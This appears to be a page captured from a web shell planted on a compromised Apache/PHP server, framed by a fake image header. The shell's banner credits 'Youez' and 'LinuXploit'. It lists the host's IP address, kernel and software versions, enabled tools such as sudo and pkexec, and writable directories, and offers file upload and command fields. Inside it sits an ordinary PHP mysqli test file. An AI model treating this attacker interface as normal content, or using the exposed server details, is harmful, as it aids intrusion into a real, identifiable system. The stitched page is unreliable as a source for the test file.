????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.133.83.94
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/home/b8009/php-5.6.22/ext/mysqli/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/home/b8009/php-5.6.22/ext/mysqli/tests/mysqli_stmt_bind_param_many_columns.phpt
--TEST--
mysqli_stmt_bind_param() - Binding with very high number of columns
--SKIPIF--
<?php
require_once('skipif.inc');
require_once('skipifemb.inc');
require_once('skipifconnectfailure.inc');
?>
--INI--
memory_limit=256M
--FILE--
<?php
	/*
	The way we test the INSERT and data types overlaps with
	the mysqli_stmt_bind_result test in large parts. There is only
	one difference. This test uses mysqli_query()/mysqli_fetch_assoc() to
	fetch the inserted values. This way we test
	mysqli_query()/mysqli_fetch_assoc() for all possible data types
	in this file and we test mysqli_stmt_bind_result() in the other
	test -- therefore the "duplicate" makes some sense to me.
	*/
	require_once("connect.inc");

	if (!$link = my_mysqli_connect($host, $user, $passwd, $db, $port, $socket)) {
		printf("[001] Cannot connect to the server using host=%s, user=%s, passwd=***, dbname=%s, port=%s, socket=%s\n",
			$host, $user, $db, $port, $socket);
		exit(1);
	}

	$cols = 2500;

	list($old_max_allowed_packet) = $link->query("SELECT @@max_allowed_packet")->fetch_row();
	if (!$link->query("SET GLOBAL max_allowed_packet=(2<<29)")) {
		if (1227 == mysqli_errno($link)) {
			/* [1227] Access denied; you need the SUPER privilege for this operation */
			$cols = 10;
		} else {
			$cols = 10;
			printf("[002] Failed to set max_allowed_packet the test table: [%d] %s\n", mysqli_errno($link), mysqli_error($link));
		}
	}
	mysqli_close($link);


	if (!$link = my_mysqli_connect($host, $user, $passwd, $db, $port, $socket)) {
		printf("Cannot connect to the server using host=%s, user=%s, passwd=***, dbname=%s, port=%s, socket=%s\n",
			$host, $user, $db, $port, $socket);
		exit(1);
	}

	if (!mysqli_query($link, 'DROP TABLE IF EXISTS test')) {
		printf("Failed to drop old test table: [%d] %s\n", mysqli_errno($link), mysqli_error($link));
		exit(1);
	}

	$str = array();
	for ($i = 1; $i <= $cols; $i++) {
		$str[] ="a$i BLOB";
	}
	$link->query("CREATE TABLE test(" . implode(" , ", $str) . ") ENGINE=MyISAM");
	if (mysqli_errno($link)) {
		printf("Failed to create the test table: [%d] %s\n", mysqli_errno($link), mysqli_error($link));
		die("");
	}
	$stmt = $link->prepare("INSERT INTO test VALUES(".str_repeat("?, ", $cols-1) . "?)");
	var_dump($stmt->id);
	$s = str_repeat("a", 2 << 12);
	$eval_str="\$stmt->bind_param(\"".str_repeat("s",$cols)."\", ";
	for ($i = 1; $i < $cols; $i++) {
		$eval_str.="\$s,";
	}
	$eval_str.="\$s";
	$eval_str.=");";
	eval($eval_str);
	printf("executing\n");
	if (!$stmt->execute()) {
		printf("failed");
		printf("Failed to execute: [%d] %s\n", mysqli_stmt_errno($stmt), mysqli_stmt_error($stmt));
	} else {
		var_dump(true);
	}

	mysqli_stmt_close($stmt);


	if (!$link->query("SET GLOBAL max_allowed_packet=$old_max_allowed_packet")) {
		if (1227 != mysqli_errno($link))
			printf("Failed to set max_allowed_packet the test table: [%d] %s\n", mysqli_errno($link), mysqli_error($link));
	}

	mysqli_close($link);

	print "done!";
?>
--CLEAN--
<?php
	require_once("clean_table.inc");
?>
--EXPECTF--
int(1)
executing
bool(true)
done!

Youez - 2016 - github.com/yon3zu
LinuXploit